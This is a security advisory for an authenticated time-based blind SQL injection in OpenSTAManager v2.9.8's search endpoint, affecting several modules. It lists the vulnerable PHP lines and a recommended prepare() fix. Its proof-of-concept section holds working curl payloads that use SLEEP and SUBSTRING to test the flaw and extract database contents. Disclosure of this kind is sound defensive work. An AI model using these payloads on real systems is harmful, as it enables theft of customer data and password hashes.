PT-2026-6848 · Packagist · Devcode-It/Openstamanager

Published

2026-02-06

·

Updated

2026-02-06

CVSS v4.0

8.7

High

VectorAV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.
Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameter: term (GET) Affected Endpoint: /ajax search.php Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Vulnerability Chain:
  1. Entry Point: /ajax search.php (Line 30-31)
$term = get('term');
$term = str replace('/', '/', $term);
The $term parameter undergoes minimal sanitization (only forward slash replacement).
  1. Distribution: /src/AJAX.php::search() (Line 159-161)
$files = self::find('ajax/search.php');
array unshift($files, base dir().'/ajax search.php');
foreach ($files as $file) {
  $module results = self::getSearchResults($file, $term);
The unsanitized $term is passed to all module-specific search handlers.
  1. Execution: /src/AJAX.php::getSearchResults() (Line 373)
require $file;
Each module's search.php file is included with $term variable in scope.
  1. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()
All Affected Files (10+ vulnerable instances):
  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)
foreach ($fields as $name => $value) {
  $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
}
$rs = $dbo->fetchArray($query);
Impact: Direct concatenation without prepare(), allows full SQL injection.
  1. /modules/ordini/ajax/search.php - Line 43, 47
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
$query .= '... WHERE `mg articoli`.`codice` LIKE "%'.$term.'%" OR `mg articoli lang`.`title` LIKE "%'.$term.'%"';
  1. /modules/ddt/ajax/search.php - Line 43, 47
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  1. /modules/fatture/ajax/search.php - Line 45, 49
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  1. /modules/preventivi/ajax/search.php - Line 45, 49
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  1. /modules/anagrafiche/ajax/search.php - Line 62, 107, 162
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
  1. /modules/impianti/ajax/search.php - Line 46
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
Properly Sanitized (NOT vulnerable):
  • /modules/contratti/ajax/search.php - Uses prepare() correctly
  • /modules/automezzi/ajax/search.php - Uses prepare() correctly
Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.
image

PoC

Step 1: Login
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' 
 -d 'username=admin&password=admin'
Step 2: Verify Vulnerability (Time-Based SLEEP)
# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt 
 'http://localhost:8081/ajax search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt 
 'http://localhost:8081/ajax search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s
image
Step 3: Data Extraction - Database Name
# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt 
 "http://localhost:8081/ajax search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" 
 > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt 
 "http://localhost:8081/ajax search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" 
 > /dev/null
# Result: real 0m0.30s
image

Impact

Affected Users: All authenticated users with access to the global search functionality.
  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request
Recommended Fix:
Replace all instances of direct $term concatenation with prepare():
BEFORE (Vulnerable):
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
AFTER (Fixed):
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');
Apply this fix to ALL affected files:
  1. /modules/articoli/ajax/search.php - Line 51
  2. /modules/ordini/ajax/search.php - Lines 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lines 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lines 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
  7. /modules/impianti/ajax/search.php - Line 46

Fix

SQL injection

Weakness Enumeration

CWE-89

Related Identifiers

GHSA-4HC4-8599-XH2H

Affected Products

Devcode-It/Openstamanager